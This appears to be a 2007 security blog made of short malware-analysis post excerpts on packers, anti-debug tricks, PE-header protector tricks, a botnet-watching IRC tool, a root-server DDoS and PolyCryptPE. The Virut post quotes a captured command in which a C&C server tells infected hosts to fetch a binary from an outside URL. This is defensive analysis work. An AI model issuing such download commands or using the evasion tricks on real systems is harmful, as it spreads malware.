Usually when dealing with unknow malware it’s interesting to know if there are any packers / protectors used in the malware. For a seasoned malware analyst it’s easy to spot whether any of those are present or not. But even the best analyst can’t outright say what the actual packer / protector is on every sample. There are some publicly available signature scanners, with PEiD being the most widely known.
It’s quite common to run into malicious programs (malware) that deploy various methods to detect debuggers. It’s good to be aware what can be thrown on your face when you’re analyzing or unpacking a malware. I’ll list a few here, and some ways to circumvent them.
I was recently creating a lightweight program to track botnet update commands. Currently it can connect to an IRC server, join a channel there and monitor the update commands. Every time it sees a certain update command it gives me a nice popup on the URL.
Originally, the program was 4096 bytes long, and I got interested on how small I can make it.
Currently the size is 2048 bytes, and if I have more time I’ll try to shave a few bytes off of it ;)
Quite a small for an IRC bot, eh?
Update (24.2.2007, 00:10 GMT+2):
The size is now 1639 bytes :)
I decided to poke around Virut a bit more. I followed the IRC trail, and spotted the following:
USER u394876 . . :_
NICK ssajvgia
JOIN &virtu
:ssajvgia!~u394876@xxx.xxx.xx.xxx JOIN :&virtu
:* PRIVMSG ssajvgia :!get http://www.ircer.pl:XX/XX.gif
So, what we have here is the C&C server at proxima.ircgalaxy.pl commanding the new infectees to download a binary from www.ircer.pl
I ran into an unknown protector few days ago. The main protection in it is boredom: it jumps around and around for hundreds of time, and few times in between executing junk code. It does have some anti-debug and anti-analysis tricks, but the fact that I bypassed all the protections manually in under 15 mins tells a lot of the quality. I reckon it’s been done by some poor botherder somewhere who is now being ’sooooo l337′. Main tricks in the protector were:
OllyDbg first refused to debug the file, and when I took a look at the PE header it was quite obvious why :)
The number of directory entries was set to 2B4ADD80h , instead of the normal 10. After manually fixing the headers, the file was ready to receive some gentle love and care from OllyDbg.
If you run into any interesting samples regarding packers or malwares, you can send samples in a password protected zip to samples_at_teamfurry_dot_com
——————————–
Update 11.3.2007:
The packer in question is something called AlexProtector :)
The original article is in swedish, sorry :) Basically, they are trying to push through a law that would allow the FRA (The local military intelligence) to listen on all internet traffic going through Swedish borders. Will be interesting to see how it falls through.
Virut is a weird freak amongst malware. It’s a file infecting virus with IRC capabilities. It doesn’t use exploits to spread, but rather relies on filesharing by infecting various .exe and .scr files. (more…)
Few of the DNS root servers have been under a DDOS attack since 6.2.2007 10:00 UTC.
g.root-servers.net and l.root-servers.net are taking the biggest hit, with few other servers either are not targeted or have not seen too much traffic.
The current status can be seen here or here.
PS. Today is the “Safer Internet Day” ;)
As the name hints, PolycryptPE is a polymorphic executable packer that was made by JLabSoftware, but has since been dropped from development. JLabSoftware had some heated conversations since at least the anti-virus vendor Kaspersky flagged every file packed with PolyCryptPE. Anyway, PolyCryptPE deploys some nice stuff like File locking, ApiHooking and some inlined anti-debug and anti-dump stuff.